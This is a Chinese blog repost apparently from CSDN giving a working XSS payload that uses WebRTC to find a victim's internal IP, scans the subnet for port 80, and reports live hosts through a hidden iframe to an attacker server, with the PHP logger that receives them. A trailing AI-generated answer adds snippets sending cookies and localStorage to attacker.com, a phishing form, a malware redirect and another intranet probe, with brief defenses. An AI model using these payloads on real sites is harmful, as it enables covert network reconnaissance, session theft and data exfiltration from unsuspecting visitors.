xss实现获取内网ip

最新推荐文章于 2024-10-02 17:09:42 发布
转载 最新推荐文章于 2024-10-02 17:09:42 发布 · 1.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/afanti/p/8325226.html

本文介绍了一种使用WebRTC技术从浏览器获取内部网络IP地址的方法,并通过XSS漏洞将这些IP地址发送到指定服务器,适用于渗透测试场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前提得浏览器支持webRTC,测试的时候google浏览器测试成功,火狐浏览器不支持webRTC,

再在xss平台直接复制如下js代码:

 1 function form_ip(ip,port){ 
 2     var iframe = document.createElement("iframe");                //通过iframe将可访问的内网ip传给服务器。
 3     iframe.setAttribute("src","http://192.168.155.2/rev.php?ip=" + ip + "&port=" + port);//这里是服务器的ip
 4     iframe.setAttribute("style","display:none")
 5     var TagName = document.getElementsByTagName("body")[0];
 6     TagName.appendChild(iframe);
 7 }
 8 function getIPs(callback){
 9     var ip_dups = {};
10     var RTCPeerConnection = window.RTCPeerConnection
11         || window.mozRTCPeerConnection
12         || window.webkitRTCPeerConnection;
13     var mediaConstraints = {
14         optional: [{RtpDataChannels: true}]
15     };
16     var servers = undefined;
17     if(window.webkitRTCPeerConnection)
18         servers = {iceServers: []};
19     var pc = new RTCPeerConnection(servers, mediaConstraints);
20     pc.onicecandidate = function(ice){
21         if(ice.candidate){
22             var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
23             var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
24             if(ip_dups[ip_addr] === undefined)
25                 callback(ip_addr);
26             ip_dups[ip_addr] = true;
27         }
28     };
29     pc.createDataChannel("");
30     pc.createOffer(function(result){
31         pc.setLocalDescription(result, function(){});
32 
33     }, function(){});
34 }//通过weprtc获取内网ip
35 getIPs(function(ip){ 
36     ip = ip.split(".");
37     ip.pop();
38     ip = ip.join(".");
39     for(var i = 1;i<=255;i++){
40         var script = document.createElement("script");
41         var ip_url = ip + "." + i + ":80";
42         script.setAttribute("src","http://" + ip_url);
43         script.setAttribute("onload","form_ip('" + ip + "." + i + "','80')");//通过遍历,如果内网的ip有80端口服务,执行form_ip函数
44         var TagName = document.getElementsByTagName("body")[0];
45         TagName.appendChild(script);
46     }
47 });
我们可以在有xss注入的地方插入:<script src="http://xss平台的地址"></script>
在谷歌浏览器看控制台信息,已经将内网ip发送给服务器了。

 


http://192.168.155.2这里是我服务器的ip.
服务器接受的代码是:
1 <?php
2 $ip=$_REQUEST['ip'];
3 $port=$_REQUEST['port'];
4 $myfile=fopen("ip.txt","a");
5 fwrite($myfile,$ip.':'.$port.'   ');
6 fclose($myfile);
7 ?>

下面是服务器接受到的ip:

 接下来就是可以内网渗透了。



转载于:https://www.cnblogs.com/afanti/p/8325226.html

python http协议获取对方的ip地址_XSS获取COOKIE
weixin_39721370的博客
12-19 558
XSS获取COOKIESession(会话) 如果想要知道cookie是做什么的,那么就需要了解一下什么是会话(Session),会话,说白了其实就是用来维持你的一整个访问流程,而在程序中,跟踪会话是很重要的事情,拿某宝举栗子,用户a在浏览的时候,他放入购物车的东西无论什么时间放入的,都是属于同一个会话,不会进入b的购物车中,二者不能够混淆,因为二者属于是不同的会话。HTTP...
使用webRTc来获取内网ip
qq_45169316的博客
10-24 2674
前端本地去获取客户端真实ip地址
内网渗透和web渗透和外网渗透有什么区别
chinansa的博客
10-02 853
但是,由于目标系统可能有一定的安全防护措施,如防火墙、入侵检测系统等,所以也需要一定的技术和经验。同时,web 应用的复杂性也使得漏洞的发现和利用需要一定的专业知识和技能。比如,针对一个在线论坛的 web 应用进行渗透测试,以确保用户的账号信息、帖子内容等不会被恶意攻击者利用漏洞窃取或篡改。例如,对一家电商企业的官方网站进行渗透测试,以发现潜在的安全漏洞,防止黑客从外部入侵窃取用户数据或破坏网站正常运行。例如,通过在网站的输入框中输入特定的恶意代码,观察服务器的响应,以判断是否存在 SQL 注入漏洞。
xss获取客户端ip
jameson_的专栏
03-13 2174
(转)
xss-利用webrtc获取内网IP
weixin_34346099的博客
01-13 680
xss.js functiongetIPs(callback){ varip_dups={}; //compatibilityforfirefoxandchrome varRTCPeerConnection=window.RTCPeerConnection ...
白帽子,强大的XSS钓鱼漏洞,怎么获取用户的真实ip
weixin_44950652的博客
11-20 2525
怎么获取用户的真实ip 在一些网站和一些用户(黑客)一般是对自己的ip进行处理,找不到真实的ip地址 11种绕过CDN查找真实IP方法 一.验证是否存在CDN 1.很简单,使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN, 多地 Ping 网站有: http://ping.chinaz.com/ (http://ce.cloud.360.cn/ http:...
XSS自动化入侵内网
匆匆那年的专栏
08-17 2305
XSS自动化入侵内网 0×01 前言: 很多人都认为XSS只能做盗取cookies的活。以至于有些SRC、厂商对待反射型XSS视而不见,或者说是根本不重视。 直到“黑哥”在之前的演讲中提到XSS入侵内网,情况才得以好转。但是经过本人测试,黑哥所说的XSS内网入侵,应该是包含了浏览器漏洞。那没有浏览器漏洞该如何呢?就像0x_Jin之前在乌云报道的搜狐漏洞那样:http://www.wooy...
内网渗透一:利用Xss漏洞进入内网
xysoul的专栏
05-02 8291
0x01:科普 Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配 0x01:科普 Beef目前欧美最流行的WEB框架攻击平台,全称:
【学习笔记】日志xss内网,nginx&apache结合的bug
chualam的博客
11-12 395
apache和nginx的日志不美观,很难看,所以一些管理员会对其进行排版并输出成html的格式 这时我们在消息头的ua部分进行xss提交即可 获取内网IP的js代码(使用WebRTC,因为浏览器限制,想获取真实的外网IP,除chrome、Firefox之外都不行)。 如果想获取外网IP,把第12行,改为 servers ={iceServers:[{urls:“stun:stun.services.mozilla.com”}]};就行了。在文章底部会给出代码,大伙可自行下载(打开控制台即可见到IP)。O
分享进入内网的详细步骤
王浩然的博客
05-25 6471
分享进入内网的详细步骤:   想要进入官网,首选要突破网关(GetWay),这很容易理解,因为一个内网要访问internet总是必然通过网关接入的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。   突破网关以后,我们的目标就是通过网关(IP为202.98.*.*)上网的192.168.21.75。以后的方法就是在网关力端口重定向,建立包转发。端口重定向分两种(lo
我是如何通过一个 XSS 探测搜狐内网扫描内网并且蠕动前台到最后被发现的
weixin_30325487的博客
07-08 406
我是如何通过一个 XSS 探测搜狐内网扫描内网并且蠕动前台到最后被发现的!(附带各种 POC) | WooYun-2014-76685 | WooYun.orghttp://wooyun.org/bugs/wooyun-2014-076685 传送门: 文章很精彩 转载于:https://www.cnblogs.com/dongchi/p/4073410.html...
web安全:XSS测试平台使用教程
热门推荐
平平无奇
08-12 2万+
我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 一、注册用户并登录 二、创建项目 1.创建项目,创建完后会生成一个xss可用脚本地址 项目名...
XSS注入日志ip问题
q908544703的博客
06-02 628
详情:系统存在xss注入问题,容易被利用执行恶意代码 问题详情: 用如下方法获取ip
xss跨站脚本攻击总结
太阳照耀我走四方
07-16 2332
svg onload="alert(1)"> //onerror 当加载文档或图像时发生某个错误无的弹窗语句onclick="alert(1)" //鼠标单击事件onmouseover="alert(1)" //鼠标悬浮事件最后还有很多的绕过姿势,推荐博客cookie:存储本地 存活时间较长 小中型session: 会话 存储服务器 存活时间较短 大型企业使用。
js获取用户ip
super苹果核的博客
11-05 1018
该方法来自于github,地址:https://github.com/diafygi/webrtc-ips //get the IP addresses associated with an account function getIPs(callback){ var ip_dups = {}; //compatibility for firefox and chrome...
在浏览器中使用WebRTC获取用户IP地址
南城
11-21 1844
WebRTC是一个开源项目,通过简单的API为Web浏览器和移动的应用程序提供实时通信功能。WebRTC支持浏览器之间的音频、视频和数据流,允许开发人员构建视频聊天、文件传输和屏幕共享等应用程序,而无需依赖第三方插件或扩展。WebRTC。
XSS详解
qq_39511050的博客
09-15 2904
XSS跨站脚本攻击详解
web前端安全之XSS
wlz555的博客
01-28 257
web安全 前端安全 XSS
xss攻击如何扩大危害
最新发布
05-29
### XSS攻击的扩展危害及可能的利用方式 XSS(跨站脚本攻击)不仅能够窃取用户的敏感信息,还可以通过多种手段扩大其危害范围和影响深度。以下是XSS攻击可能造成的扩展危害及其利用方式: #### 1. 窃取用户会话信息 攻击者可以通过注入恶意脚本获取用户的Cookie或其他认证令牌。例如,利用JavaScript代码创建一个不可见的`<img>`标签,并将用户的Cookie发送到攻击者的服务器[^5]。 ```javascript var img = document.createElement('img'); img.src = 'http://attack.com/?cookie=' + encodeURIComponent(document.cookie); img.style.display = 'none'; document.body.appendChild(img); ``` #### 2. 劫持用户会话 一旦攻击者获取了用户的Cookie,他们可以冒充合法用户进行操作,例如修改个人资料、转账或发布内容。这种行为不仅影响用户账户的安全性,还可能导致企业声誉受损。 #### 3. 恶意软件传播 攻击者可以通过XSS攻击嵌入恶意脚本,这些脚本可能会下载并执行恶意软件。例如,通过重定向用户到包含恶意软件的网站: ```javascript window.location.href = "http://malicious-site.com/malware.exe"; ``` 这种方式可以进一步扩大攻击的影响范围,甚至感染用户的设备。 #### 4. 数据泄露 存储型XSS攻击尤其危险,因为它不需要用户交互即可触发。攻击者可以在网站上永久植入恶意脚本,导致所有访问该页面的用户数据被泄露[^3]。例如,攻击者可以在论坛帖子中插入以下代码: ```javascript <script> fetch('http://attacker.com/steal', { method: 'POST', body: JSON.stringify({ data: localStorage }), headers: { 'Content-Type': 'application/json' } }); </script> ``` #### 5. 社交工程与钓鱼攻击 XSS攻击可以用于伪装成合法网站,欺骗用户输入敏感信息。例如,通过动态生成伪造的登录表单,诱导用户提交密码: ```html <form action="http://phishing-site.com" method="POST"> <input type="text" name="username" placeholder="Username"> <input type="password" name="password" placeholder="Password"> <button type="submit">Login</button> </form> ``` #### 6. 网站功能滥用 攻击者可以利用XSS攻击调用目标网站的功能接口,执行未经授权的操作。例如,通过伪造请求更改用户的电子邮件地址或启用双因素认证: ```javascript fetch('/api/update-email', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ email: 'attacker@example.com' }) }); ``` #### 7. 内部网络渗透 如果受害者在企业内部网络中工作,攻击者可以通过XSS攻击获取内网IP地址或其他敏感信息。例如,通过探测内部服务端口: ```javascript for (let i = 1; i <= 255; i++) { const xhr = new XMLHttpRequest(); xhr.open('GET', `http://192.168.1.${i}`, true); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { fetch('http://attacker.com/report?ip=192.168.1.' + i); } }; xhr.send(); } ``` ### 防御策略 为了防止XSS攻击扩大其危害,可以采取以下措施: - 使用HTML转义函数对用户输入进行处理[^1]。 - 在SpringBoot应用中结合注解和过滤器实现全面的XSS防御[^2]。 - 禁止以`javascript:`开头的链接和其他非法scheme的使用[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值